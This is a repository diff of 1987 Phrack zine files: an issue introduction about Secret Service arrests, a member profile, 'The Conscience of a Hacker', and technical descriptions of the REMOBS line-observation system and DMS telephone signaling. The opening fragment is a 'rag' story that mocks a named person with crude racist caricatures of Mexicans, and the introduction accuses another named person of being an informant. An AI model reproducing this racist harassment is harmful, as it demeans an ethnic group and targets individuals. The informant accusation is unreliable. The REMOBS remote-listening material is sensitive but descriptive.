20. When Oryan Quest says...
|
||||
'I am gonna bill $20000 to you Taran!'
|
||||
He really means...
|
||||
'PLEASE let me back on Metal Shop!'
|
||||
21. When The Executioner says...
|
||||
'Yes, Taran I will have your file in time for Phrack.'
|
||||
He really means...
|
||||
'I fucked up again and I'll have to get Bill to help me
|
||||
out.'
|
||||
22. When Bill From RNOC says...
|
||||
'Hey, what's up?'
|
||||
He really means...
|
||||
'I'm here to leach all your new stuff, pull your tolls
|
||||
and stab you in the back.'
|
||||
=============================================================
|
||||
ORYAN QUEST - A point by point historical recreation of this
|
||||
controversial excuse for recycled shit from
|
||||
the sewer of Mexico.
|
||||
"Juan!!!", screamed the mexican lady, "get over here,
|
||||
mucho expresso!"
|
||||
"Coming my little tortilla!!", panted the tired Mexican peasant.
|
||||
"What is it my little bag of cabbage leaves?", inquired
|
||||
the Hispanic mongrel.
|
||||
"Juan, Juan, Juan, I tink I am stricken with baby!"
|
||||
exclaimed his wife.
|
||||
"OH NO! my babaloo!, not another little child," cried
|
||||
Juan, "We cannot afford to have another child."
|
||||
"My wages picking coffee beans and stripping cabbage
|
||||
barely feed our other 12 children, how am I going to support
|
||||
THIS bastard billy-goat?", asked Juan.
|
||||
Well, the day finally came, and the poverty stricken
|
||||
couple made their way to the village hospital, by way of
|
||||
mule, a mercedes to the couple.
|
||||
"Oooooooooh....", cried the lady in pain, as the baby
|
||||
pushed it's way forward.
|
||||
"Ohhh what a beautiful child", exclaimed Juan.
|
||||
"Uh senor, that's the pre-natal discharge, your baby is
|
||||
next.", corrected the doctor.
|
||||
The baby's body began to appear(feet first, of course),
|
||||
it's WIDE vertical smile, greeting the world.
|
||||
"Oh my,",said Juan,"he looks just like his papa!"
|
||||
"I must give him a proper name.", continued Juan.
|
||||
"I name you..
|
||||
Senor Pepe Guadaloop Tom Flanagan Paco Oryan QUESTO!"
|
||||
|
||||
[Pretend there is alot of applause]
|
||||
|
||||
Well, Paco, I mean QUEST, learned the trade of his
|
||||
father and his father's father. Toiling and slaving away, he
|
||||
dreamed of one day going to America, north of the border,
|
||||
and leading a life of a re-fried bean.
|
||||
One lazy sunny day, Paco and his father were doing
|
||||
their daily fishing, trying to make a living for themselves
|
||||
and feed their family,with out eating stray dogs. Questo was
|
||||
casting off with his new hardwood fishing pole that his
|
||||
father made for him that very morning. Juan was picking his
|
||||
nose and batting an eye at his son, marveling his skill at
|
||||
throwing the line.
|
||||
Suddenly Paco's line went taut with a quick jerk and
|
||||
Paco's limp 100 lb body flew into the water with a splash.
|
||||
"Oh no, my little chili bean fart, what should I do.
|
||||
Juan pulled Quest out of the water. Well, he thought "At
|
||||
least he's clean now, I don't think he'll be thirsty for at
|
||||
least another week.
|
||||
|
||||
[Sorry to end this story so abruptly, but Oryan Quest is
|
||||
not worth more than 5K, come to think of it he's not worth a
|
||||
byte. I figgured since he tried SOOOO hard to write a rag
|
||||
file about me (See Phrack 12) that I ought to show exactly
|
||||
what the word, "rag" means.
|
50
phrack14/1.txt
Normal file
50
phrack14/1.txt
Normal file
|
@ -0,0 +1,50 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Issue XIV, File 1 of 9
|
||||
|
||||
Released On July 28, 1987
|
||||
|
||||
Hi and welcome to the final regular issue of Phrack Newsletter. Most of you
|
||||
already know about the nationwide arrest of many of the phreak/hack world's
|
||||
most knowledgeable members. I may receive a visit from the authorities as
|
||||
well and because of this and other events, I am going to leave the modem
|
||||
world.
|
||||
|
||||
As of now, Phrack Inc. is dissolved. It may put out an annual publication
|
||||
once a year in the summer, but this is only a possibility. If I remain a free
|
||||
person, I will be able to release Phrack XV which will only be news and it
|
||||
will feature details about Dan The Operator, PartyCon '87, and, of course, the
|
||||
current Secret Service bust wave.
|
||||
|
||||
One last thing to mention. Although I don't have the time to go into full
|
||||
detail about it right now, at the current time, we at Phrack Inc. have
|
||||
uncovered a large amount of evidence to support the conclusion that MAD HATTER
|
||||
is an informant. He should be deleted off of any BBSes that he calls. We
|
||||
believe that he was planted by the Secret Service to infiltrate PartyCon '87
|
||||
and frame Control C and many others.
|
||||
|
||||
One last statement to make before the directory. Basically, I have wanted my
|
||||
escape from the phreak/hack world for a long time. I figured SummerCon '87
|
||||
would be my last big thing and then I'd write the article for PWN and by July
|
||||
1, 1987, I would be done and out of the modem community. Unfortunately,
|
||||
events just kept happening and are still in motion. Even if I am not busted,
|
||||
as of August 1, 1987, I am considering myself not a member of the modem
|
||||
community and I will not appear anywhere. If Phrack XV isn't out by then, you
|
||||
won't see it ever. I'm sorry, but that's the way it has to be.
|
||||
|
||||
This issue features:
|
||||
|
||||
Introduction by Knight Lightning . . . . . . . . . . . . . ..012 Apple Sectors
|
||||
Phrack Pro-Phile X Featuring Terminus by Taran King. . . . ..030 Apple Sectors
|
||||
The Conscience of a Hacker {Reprint} by The Mentor . . . . ..017 Apple Sectors
|
||||
The Reality of The Myth [REMOBS] by Taran King . . . . . . ..026 Apple Sectors
|
||||
Understanding DMS Part II by Control C . . . . . . . . . . ..071 Apple Sectors
|
||||
TRW Business Terminology by Control C. . . . . . . . . . . ..021 Apple Sectors
|
||||
Phrack World News Special Edition #1 by Knight Lightning . ..053 Apple Sectors
|
||||
Phrack World News Issue XIV/1 by Knight Lightning. . . . . ..070 Apple Sectors
|
||||
Phrack World News Issue XIV/2 by Knight Lightning. . . . . ..101 Apple Sectors
|
||||
|
||||
I hope you enjoy it.
|
||||
|
||||
:Knight Lightning
|
||||
______________________________________________________________________________
|
142
phrack14/2.txt
Normal file
142
phrack14/2.txt
Normal file
|
@ -0,0 +1,142 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 14, Phile #2 of 9
|
||||
|
||||
==Phrack Pro-Phile X==
|
||||
|
||||
Written and Created by Taran King
|
||||
|
||||
5/24/87
|
||||
|
||||
Welcome to Phrack Pro-Phile X. Phrack Pro-Phile is created to bring
|
||||
info to you, the users, about old or highly important/controversial people.
|
||||
This month, we bring to you a sysop and user of past days...
|
||||
|
||||
Terminus
|
||||
~~~~~~~~
|
||||
|
||||
Terminus is the sysop of NetSys Unix and, in the past, ran Metronet.
|
||||
------------------------------------------------------------------------------
|
||||
Personal
|
||||
~~~~~~~~
|
||||
Handle: Terminus
|
||||
Call him: Len
|
||||
Past handles: Terminal Technician
|
||||
Handle origin: Terminal Technician originated because of Len's view of
|
||||
himself as a hacker. Terminus was an offshoot of that
|
||||
and, although it is an egotistical view, it means he has
|
||||
reached the final point of being a proficient hacker.
|
||||
Date of Birth: 1/10/59
|
||||
Age at current date: 29 years old
|
||||
Height: 5'9"
|
||||
Weight: About 190 lbs.
|
||||
Eye color: Hazel
|
||||
Hair Color: Brown
|
||||
Computers: 6800 home brew system, Apple ][, Altair S100, 2 Apple
|
||||
][+es, IBM PC, IBM XT, IBM 3270, IBM AT, and 2 Altos
|
||||
986es.
|
||||
Sysop/Co-Sysop of: MetroNet, MegaNet, and NetSys Unix.
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
Terminus began with the 6800 home brew system which he built himself.
|
||||
It was built on a STD44 bus and it had 8K of memory. He then got the Apple ][
|
||||
(plain old ][) which was impressive with its cassette drive and RF modulator.
|
||||
He then got an Altair S100 which he liked because it looked like a mainframe
|
||||
and he also enjoyed building it. The 2 ][+es came along and he got himself a
|
||||
few floppies and a hard drive. He then sold 2 of the Apples and gave away all
|
||||
his software (and kept 1 Apple with a 15 meg hard drive) and got the IBM PC.
|
||||
He was impressed at the time and ditched the Apple. Due to frustration from
|
||||
switching from an Apple Cat to a Hayes, he sat down and wrote a hacker which
|
||||
eventually turned into CodeBuster, which was, for a long time, the only good
|
||||
hacker available on IBM. He then expanded and got an XT and slowly increased
|
||||
his amount of storage. When the AT came out, he got rid of the PC and got the
|
||||
AT and at the same time, bought the IBM 3270. After playing around with the
|
||||
AT for a long time, he sold it because he needed some money so he was left
|
||||
with the XT and 3270. The XT was sold to make money to buy the Altos 986 and
|
||||
he sold the 3270 about 4 months ago, now leaving him with the 2 Altos 986es.
|
||||
|
||||
Terminus started running a bulletin board with an unmentionable board
|
||||
to start with in 914 (where he met Paul Muad'Dib), and eventually got MetroNet
|
||||
going. MetroNet's original purpose was to be a phreak/hack board. It was run
|
||||
on an Apple ][ with 4 8" drives and 2 floppies plus a 5 meg hard drive, which
|
||||
made for an impressive system. It was going really well for a while, but then
|
||||
the hard drive crashed, leaving the board down for about a month and things
|
||||
slowed down after that. At that time, he got a 15 meg drive, and a 1200
|
||||
modem soon followed and it stayed up for about a year and a half total, at
|
||||
which time Lord Digital was co-sysop. It finally went down because he moved.
|
||||
MegaNet was his next system, which ran under Concurrent PC-DOS. It looked
|
||||
like a public domain system, but that was camouflage. It was multi-user (2
|
||||
phone lines) and it ran on the XT. That went down because he moved again
|
||||
after being up for over a year. He is currently running NetSys Unix on his 2
|
||||
Altos 986es which are networked. The system consists of 2 Altos 986es, an
|
||||
Ethernet link, 240 megs, and 4 phone lines on a hunt, 3 of which are 1200 baud
|
||||
and the final line is 2400 baud. To get on NetSys, it is just $5 a month and
|
||||
it can be reached at 301-540-3659 (2400 baud), and 3658-3656 (300/1200 baud).
|
||||
|
||||
Terminus has never really met anyone in person from the phreak/hack
|
||||
community, although he had many chances to in New York when he lived there.
|
||||
He did go to a couple of Tap meetings, but doesn't remember anyone in specific
|
||||
from when he went.
|
||||
|
||||
Len started phreaking and hacking through a friend who worked in the
|
||||
phone company that told him about various things that could be done with
|
||||
electronics to play with the network. He was very paranoid about boxing so he
|
||||
never did anything like that (from his house anyway). He started hacking
|
||||
naturally after he got a computer. His favorite system was the University of
|
||||
Illinois because of its huge size and capabilities.
|
||||
|
||||
Some of the memorable phreak boards he was on included Plovernet,
|
||||
L.O.D., Pirate 80, OSUNY, Sherwood Forest I, and Shadowland.
|
||||
|
||||
Terminus is an electrical engineer and he designs boards for
|
||||
different minicomputers like PDP-11s, Data Generals, VAXes, and Perkin-Elmer.
|
||||
He also writes some software to interface the boards that he makes. He's
|
||||
pretty decent at machine language, but recently (maybe because of the Unix?
|
||||
Maybe?) he's gotten into C.
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
Interests: Telecommunications (modeming, phreaking, hacking), music,
|
||||
and smoking (ahem).
|
||||
|
||||
Terminus's Favorite Things
|
||||
--------------------------
|
||||
|
||||
Smoking: Let's leave it at that.
|
||||
Music: Hard rock and progressive jazz (he used to be a drummer).
|
||||
Programming: Writing software for fun.
|
||||
|
||||
Most Memorable Experiences
|
||||
--------------------------
|
||||
|
||||
Getting interviewed by the FBI in 1983 due to someone in Iowa getting busted.
|
||||
The first time he discovered Alliance Teleconferencing and ran a conference.
|
||||
|
||||
Some People to Mention
|
||||
----------------------
|
||||
|
||||
Krackowicz (Just a big "Thanks.")
|
||||
The (414) Gizard (Sysop of Cryton Elite, thanks for giving him the phone
|
||||
numbers and names to everyone on your system.)
|
||||
Lord Digital (For being a good friend [Where the hell are you?].)
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
Terminus shares Tuc's views on carding and feels it's a big gap
|
||||
between committing fraud and learning the network. As he got older, he got
|
||||
more paranoid about things like that. He also feels that the phreak/hack
|
||||
"community" has already crumbled. He also feels that the old days were
|
||||
better.
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
I hope you enjoyed this file, ...And now for the regularly taken poll from all
|
||||
interviewees.
|
||||
|
||||
Of the general population of phreaks you have met, would you consider most
|
||||
phreaks, if any, to be computer geeks? No, none of the people that he hung
|
||||
out with. Thank you for your time, Len.
|
||||
|
||||
Taran King
|
||||
Sysop of Metal Shop Private
|
||||
______________________________________________________________________________
|
79
phrack14/3.txt
Normal file
79
phrack14/3.txt
Normal file
|
@ -0,0 +1,79 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Issue XIV, File 3 of 9
|
||||
|
||||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||||
The following file is being reprinted in honor and sympathy for the many
|
||||
phreaks and hackers that have been busted recently by the Secret Service. -KL
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
\/\The Conscience of a Hacker/\/
|
||||
|
||||
by
|
||||
|
||||
+++The Mentor+++
|
||||
|
||||
Written on January 8, 1986
|
||||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||||
|
||||
Another one got caught today, it's all over the papers. "Teenager
|
||||
Arrested in Computer Crime Scandal," "Hacker Arrested after Bank Tampering"...
|
||||
Damn kids. They're all alike.
|
||||
|
||||
But did you, in your three-piece psychology and 1950's technobrain,
|
||||
ever take a look behind the eyes of the hacker? Did you ever wonder what
|
||||
made him tick, what forces shaped him, what may have molded him?
|
||||
I am a hacker, enter my world...
|
||||
Mine is a world that begins with school... I'm smarter than most of
|
||||
the other kids, this crap they teach us bores me...
|
||||
Damn underachievers. They're all alike.
|
||||
|
||||
I'm in junior high or high school. I've listened to teachers explain
|
||||
for the fifteenth time how to reduce a fraction. I understand it. "No, Ms.
|
||||
Smith, I didn't show my work. I did it in my head..."
|
||||
Damn kid. Probably copied it. They're all alike.
|
||||
|
||||
I made a discovery today. I found a computer. Wait a second, this is
|
||||
cool. It does what I want it to. If it makes a mistake, it's because I
|
||||
screwed it up. Not because it doesn't like me...
|
||||
Or feels threatened by me...
|
||||
Or thinks I'm a smart ass...
|
||||
Or doesn't like teaching and shouldn't be here...
|
||||
Damn kid. All he does is play games. They're all alike.
|
||||
|
||||
And then it happened... a door opened to a world... rushing through
|
||||
the phone line like heroin through an addict's veins, an electronic pulse is
|
||||
sent out, a refuge from the day-to-day incompetencies is sought... a board is
|
||||
found.
|
||||
"This is it... this is where I belong..."
|
||||
I know everyone here... even if I've never met them, never talked to
|
||||
them, may never hear from them again... I know you all...
|
||||
Damn kid. Tying up the phone line again. They're all alike...
|
||||
|
||||
You bet your ass we're all alike... we've been spoon-fed baby food at
|
||||
school when we hungered for steak... the bits of meat that you did let slip
|
||||
through were pre-chewed and tasteless. We've been dominated by sadists, or
|
||||
ignored by the apathetic. The few that had something to teach found us will-
|
||||
ing pupils, but those few are like drops of water in the desert.
|
||||
|
||||
This is our world now... the world of the electron and the switch, the
|
||||
beauty of the baud. We make use of a service already existing without paying
|
||||
for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
|
||||
you call us criminals. We explore... and you call us criminals. We seek
|
||||
after knowledge... and you call us criminals. We exist without skin color,
|
||||
without nationality, without religious bias... and you call us criminals.
|
||||
You build atomic bombs, you wage wars, you murder, cheat, and lie to us
|
||||
and try to make us believe it's for our own good, yet we're the criminals.
|
||||
|
||||
Yes, I am a criminal. My crime is that of curiosity. My crime is
|
||||
that of judging people by what they say and think, not what they look like.
|
||||
My crime is that of outsmarting you, something that you will never forgive me
|
||||
for.
|
||||
|
||||
I am a hacker, and this is my manifesto. You may stop this
|
||||
individual, but you can't stop us all... after all, we're all alike.
|
||||
|
||||
+++The Mentor+++
|
||||
|
||||
[May the members of the phreak community never forget his words -KL]
|
||||
______________________________________________________________________________
|
104
phrack14/4.txt
Normal file
104
phrack14/4.txt
Normal file
|
@ -0,0 +1,104 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Issue XIV, File 4 of 9
|
||||
|
||||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||||
The Reality of the Myth
|
||||
|
||||
REMOBS
|
||||
|
||||
by Taran King
|
||||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||||
|
||||
In the past, many misconceptions have been made of the legendary
|
||||
REMOBS system. The term has been used and abused. It used to be known as
|
||||
REMOB, rather than the proper REMOBS, which stood for Remote Observation. The
|
||||
REMOBS is a REMote service OBservation System manufactured by Teltone, a
|
||||
company which makes various telephone equipment peripherals.
|
||||
|
||||
REMOBS has a number of features. The REMOBS permits evaluation of
|
||||
equipment or employee performance. It allows observation of subscriber lines,
|
||||
CO, toll, and E&M trunks, repair bureaus, and operator positions. It can be
|
||||
portable or set up as dedicated remote terminals. The observer console can
|
||||
sample entire networks. REMOBS is compatible with all types of switching and
|
||||
transmission media.
|
||||
|
||||
The purpose of the REMOBS system is to measure performance and
|
||||
service provided to customers in an impartial and unbiased manner. By
|
||||
monitoring the subscriber connections throughout the network switch, this can
|
||||
be achieved. The customer experiences are recorded and statistics are derived
|
||||
to provide service level indices.
|
||||
|
||||
REMOBS is compatible with all switching systems including Step by
|
||||
Step, Crossbar, and electronic equipment. In each situation, it can observe
|
||||
almost any transmission point such as subscriber lines, inter- and
|
||||
intra-office trunks, toll trunks, E&M trunks, repair bureaus, commercial
|
||||
offices, and operator positions. The console operators can observe by phone
|
||||
line, from one location, any switch location/CO with the remote unit
|
||||
installed.
|
||||
|
||||
The M-241 system (which includes the console and remote terminal)
|
||||
observes up to 40 circuits, but can scan up to 100 lines with a remote
|
||||
terminal. The terminal may observe up to 5 locations simultaneously, with a
|
||||
capacity to observe 500 circuits at any one time.
|
||||
|
||||
The REMOBS system can observe all remote terminals at any switching
|
||||
system location through the console controls, making it feasible to observe an
|
||||
entire network. Remote terminals are equipped with plug-in connectors so they
|
||||
can be moved routinely to observe desired locations.
|
||||
|
||||
The M-241 Remote Terminal: The remote terminal is located at the point of
|
||||
========================== observation. It may be ordered in portable or
|
||||
dedicated configuration. The remote terminal remains inactive until accessed
|
||||
by the controlling console. The remote unit is 6.5" high, 22.88" wide, and
|
||||
11.7" deep, arranged for relay rack mounting.
|
||||
|
||||
The M-242 Observer's Console: Console operators access the remote terminals
|
||||
============================= through telephone lines. Access to the remotes
|
||||
is limited to console operators who know the access number, timing, and four
|
||||
digit security code. Additional security is available with the optional
|
||||
security dialback feature. The System automatically scans observed circuits.
|
||||
The first circuit to become busy is selected and held by the system until the
|
||||
necessary information is secured, the operator presses the reset button, or
|
||||
the calling party goes on-hook. Timing circuits automatically drop the call
|
||||
100 seconds after the calling party goes off-hook or, if answer supervision is
|
||||
present, 15 seconds after the called party answers. The console itself looks
|
||||
very much like a cash register. Where the digits are normally, there are
|
||||
places for the trunk identity, called number, stop clock, and memory. The
|
||||
pushbutton controls consist of the following: power (key switch), hold
|
||||
buttons, select buttons, calling party, called party, display hold, clear,
|
||||
O.G. line, auto reset, reset (manual), read (stop clock operate), talk, voice
|
||||
exclusion, memory, plus a standard touch-tone keypad with the A, B, C, and D
|
||||
keys. There are 2 monitor jacks, a volume control and, for the primitive
|
||||
lines and switches, a rotary dial next to the touch-tone keypad. The
|
||||
operator's console stands 2.25" in the front and 8.25" in the back; it's
|
||||
17,25" wide and 16.5" deep.
|
||||
|
||||
The observation system network is set up in the following manner.
|
||||
The operator observer is in an observing center at the local Central Office
|
||||
with the M-242 REMOBS Central Console (which looks like a telephone to the
|
||||
Central Office). Through the standard telephone network, communications
|
||||
occurs between the console and the remote. From the CO, through the incoming
|
||||
circuitry, it goes through the connector to the M-241 REMOBS Remote Terminal
|
||||
(which looks like a telephone to the access line). From there the connection
|
||||
is made to the circuits to be observed including the subscribers lines,
|
||||
line-finders, toll trunks, repair lines, etc.
|
||||
|
||||
The information provided is both visual and audible. The visual
|
||||
display, showed on the panel, includes the identity of the remote terminal,
|
||||
the identity of the observed circuit, the signalled digits (up to 52), the
|
||||
status of the calling and called parties (on/off-hook), and the timing of the
|
||||
call. The audible information (which is provided through headset or handset)
|
||||
includes the call progress tones for disposition (dial tone, type of
|
||||
signalling, 60 IPM, 120 IPM, ringing, answer, etc.) and voice transmission
|
||||
(calling and called parties).
|
||||
|
||||
The REMOBS system is very much different from often-misconceived
|
||||
system known as 4Tel made by Teredyne. REMOBS is very much different from the
|
||||
dial-up - enter 1 code - be given instructions simplicity of the 4Tel but it
|
||||
still has the legendary capabilities of listening in remotely.
|
||||
|
||||
If you wish to gain more information about the REMOBS system, Teltone
|
||||
Corporation can be written to at 10801 - 120th Avenue N.E., Kirkland, WA 98033
|
||||
or phoned at (206) 827-9626.
|
||||
______________________________________________________________________________
|
376
phrack14/5.txt
Normal file
376
phrack14/5.txt
Normal file
|
@ -0,0 +1,376 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Issue XIV, File 5 of 9
|
||||
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||
|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
|
||||
|_| |_|
|
||||
|_| Understanding the Digital Multiplexing System |_|
|
||||
|_| Part II |_|
|
||||
|_| |_|
|
||||
|_| by Control C |_|
|
||||
|_| |_|
|
||||
|_| An Advanced Telecommunications, Inc. Production |_|
|
||||
|_|_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _|_|
|
||||
|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
|
||||
|
||||
|
||||
|
||||
DMS switches were first introduced in 1979. Since then it has been modified
|
||||
to interface with numerous types of switches. DMS has the ability to
|
||||
interface with SP-1, #5 XBar, 1ESS, 2ESS, 3ESS, 4ESS, NX1D, NX1E, TSD, SXS,
|
||||
ETS4, NO. 1 EAC, NO. 2 EAX, NO. 3 EAX, TSPS, CAMA/3CL boards, Stromberg
|
||||
Carlson Turret of ONI and Visual Indicators, Modified North Electric TSD for
|
||||
ONI, Stomberg Carlson (CAMA operator Position - ONI/ANI), AE #31 Switchboard,
|
||||
Co-located NT/AE switchboard I/C, O/G, UDC data poller of OM, DACS (Directory
|
||||
Assistance Charging System), NT #144 LTD, WECO #14 LTD, WECO #16 LTD, CALRS
|
||||
(Centralized Automated Loop Reporting System), Badger 612A, AE #1 and #21 LTD,
|
||||
AE #30, SC #14 LTD, Lordel MITS70 line Test System, Porta System Line Test
|
||||
Unit, Pulsar II IMTS, Teradyne loop test unit, and the WECO MLT 1 (Mechanized
|
||||
Loop Testing System).
|
||||
|
||||
|
||||
Common Channel Interoffice Signaling
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Common Channel Interoffice Signaling (CCIS) is a way of signaling and a way of
|
||||
implementing network level services. CCIS provides reliable, crystal clear
|
||||
data signaling links between the network and the switching offices. The CCIS
|
||||
signaling method uses transmission equipment that is separate from voice
|
||||
trunks.
|
||||
|
||||
|
||||
Common Channel Interoffice Signaling No. 6
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
The basis for the CCIS system is the International Consultative Committee on
|
||||
Telephone and Telegraph (CCITT) No. 6 international standard, which is brought
|
||||
to its fullest capacity for use in the Stored Program Control (SPC) network of
|
||||
AT&T.
|
||||
|
||||
The CCIS6 network contains a bunch of signaling regions, each having a pair of
|
||||
interconnected Signal Transfer Points (STP). The switching systems put into
|
||||
CCIS6 that connect to STPs are called Serving Offices (SO).
|
||||
|
||||
Band Signaling (CCIS-BS) is used on trunk signaling for intertoll-type trunks
|
||||
using the CCIS network.
|
||||
|
||||
Direct Signaling (CCIS-DS) is used for signaling between SPC switching
|
||||
machines and a Network Control Point (NCP). At the present time, CCIS6 can
|
||||
handle Enhanced INWATS Originating Screening Office (OSO), Calling Card
|
||||
Validation (CCV), Mechanized Calling Card Service (MCCS), and Billed Number
|
||||
Screening (BNS). CCIS6 is available with DMS-100/200, DMS-200, and
|
||||
DMS-100/200 or DMS-200 with TOPS.
|
||||
|
||||
|
||||
CCIS6 Diagram:
|
||||
NSB ST
|
||||
------------ - - - - - - - - - - -
|
||||
DTC | | | ------- |
|
||||
- - - DS30 | IPML | DS30 | - - - | || | |
|
||||
--------| |------|- - - - - - |------|-| |---| || | |
|
||||
Digital - - - | | | - - - | || | |
|
||||
Trunks | | | | || | |
|
||||
| | | ------- |
|
||||
| | - - - - - - -|- - - -
|
||||
DTC | | TM |
|
||||
DIG - - - DS30 | NUC | DS30 - - - -----
|
||||
--------| |------|- - - - - - |--------| |----| |
|
||||
^ - - - |Network | - - - -----
|
||||
CCIS \ ------------ Modem
|
||||
Signaling \ |
|
||||
- - - -----
|
||||
AN Links--| | | CCC |
|
||||
- - - -----
|
||||
Channel
|
||||
Bank
|
||||
|
||||
|
||||
|
||||
Acronyms:
|
||||
|
||||
DIG - Digital
|
||||
AN - Analog
|
||||
DTC - Digital Trunk Controller
|
||||
MSB - Message Switch Buffer
|
||||
ST - Signaling Terminal
|
||||
TM - Trunk Module
|
||||
NUC - Nailed-Up Connection
|
||||
IPML - Inter-Peripheral Message Link
|
||||
|
||||
|
||||
Common Channel Interoffice Signaling No. 7
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Common Channel Signaling (CCS) No. 7 or CCIS7 is a CCS system based on CCITT
|
||||
No. 7. CCIS7/CCS7 on the DMS switch consists of two parts: the Message
|
||||
Transfer Part (MTP) and the Interim Telephone user Part. They are compatible
|
||||
with DMS-100, DMS-200, DMS-100/200, and DMS-100/DMS-100/200 with TOPS.
|
||||
|
||||
CCIS7 can't tell the difference between banded and direct signaling. CCIS7
|
||||
uses Destination/Origination Point Codes (DPC/OPC) to route back to the
|
||||
switch.
|
||||
|
||||
CCIS7 can handle Automatic Calling Card Service (ACCS), Enhanced INWATS, Local
|
||||
Area Signaling Services, and Direct Service Dialing Capabilities.
|
||||
|
||||
|
||||
Equal Access
|
||||
~~~~~~~~~~~~
|
||||
The DMS-200 Access Tandem (AT) gives a traffic concentration and distribution
|
||||
function for interLATA traffic originating and a distribution function for
|
||||
interLATA traffic origination or terminating inside a Local Access and
|
||||
Transport Area (LATA). This gives the interLATA Carrier (IC) access to more
|
||||
that one end office inside the LATA. It can handle InterLATA Carrier access
|
||||
codes (10xxx), 10xxx and 950-yxxx dialing, Automatic Number Identification
|
||||
(ANI) on all calls, answer supervision, equal access Automatic Message
|
||||
Accounting (AMA) for both originating and terminating calls, and operator
|
||||
service signaling.
|
||||
|
||||
The DMS-100 EA gives direct and tandem switched access service inside the LATA
|
||||
for originating and terminating to interLATA Carriers. It is available in the
|
||||
following three ways:
|
||||
|
||||
Equal Access End Office (EAEO)
|
||||
------------------------------
|
||||
DMS-100 Equal Access End Office (EAEO) gives a direct interconnection to
|
||||
interLATA Carriers' (IC) and international Carriers' (INC) Points of Presence
|
||||
(POP) inside the LATA.
|
||||
|
||||
Access Tandem with Equal Access End Office
|
||||
------------------------------------------
|
||||
The DMS-200 Access Tandem (AT) when used with equal access end office (EAEO)
|
||||
lets trunk tandem interconnect to ICs/INCs POP inside the LATA.
|
||||
|
||||
The connection of the Equal Access End Office (EAEO) to an IC/INC through the
|
||||
DMS-200 Access Tandem (AT) uses what is called two-stage overlap output
|
||||
pulsing which makes the time it takes to set up a call quicker. The AT uses
|
||||
the digits OZZ + XXX out pulsed in the first stage to identify the IC/INC
|
||||
dialed and to pick out outgoing trunk. Then a connection is established from
|
||||
the IC/INC to the EAEO through the AT. The second stage digits consist of ANI
|
||||
and the called numbers are passed through the DMS-200 AT at the IC/INC.
|
||||
|
||||
An AMA terminating record in AT&T format is produced by the DMS-200 for all
|
||||
the EAEOs. A per call terminating AMA record is made for calls that get to
|
||||
the stage where the trunk from the IC/INC has been seized and a "wink" has
|
||||
been returned by the DMS-200 AT.
|
||||
|
||||
Access Tandem with a Non-Equal Access End Office
|
||||
------------------------------------------------
|
||||
DMS-200 AT using a non-equal access end office gives trunk tandem connection
|
||||
to an IC/INC POP within the LATA. To set up a call, connection of Feature
|
||||
Group B (FGB) or Feature Group C (FGC) End Office to an IC/INC through the
|
||||
DMS-200 AT uses the standard Bell Central Automatic Message Accounting (CAMA)
|
||||
signaling. The Access Tandem uses the XXX digits of the access code 950-YXXX
|
||||
out pulsed from the FGB end office to identify the IC/INC and to connect to an
|
||||
outgoing trunk.
|
||||
|
||||
|
||||
Mechanized Calling Card Service (MCCS)
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
The fraudulent use of calling cards, third number and collect calls and the
|
||||
increasing movement to automate current operator services has directly led to
|
||||
the implantation of the Mechanized Calling Card Service (MCCS) to DMS-200/TOPS
|
||||
and to the remote and host Operator Centralization (OC).
|
||||
|
||||
MCCS uses CCIS to relay queries and responses to and from the DMS-200/TOPS.
|
||||
Operator handled calling card calls and the direct entry by subscribers of
|
||||
Calling Cards by DTMF (Touch-Tone) telephones are given special provisions by
|
||||
the MCCS. Both the operator handling and the direct entry of calling card
|
||||
calls are decreasing the size of the operators.
|
||||
|
||||
Billed Number Screening (BNS) gives an enhancement to the operator-handled
|
||||
collect and third-number billing by using CCIS to screen a number at the
|
||||
billing validation data base for billing restrictions (i.e. the third number
|
||||
is a fortress). This feature naturally will reduce fraudulent use of the
|
||||
collect call feature.
|
||||
|
||||
Common Channel Interoffice Signaling-Direct Signaling (CCIS-DS), which is
|
||||
the feature that the MCCS is designed around, is used to transmit messages to
|
||||
and from many possible Billing Validation Centers (BVCs). Messages
|
||||
transmitted to the BVC about MCCS include the billing number and the Personal
|
||||
Identification Number (PIN). In BNS the messages have the special billing
|
||||
number (collect or third number). The return messages from the BVC include
|
||||
validity (of the number), billing restrictions (if any), and the Revenue
|
||||
Accounting Office (RAO) code.
|
||||
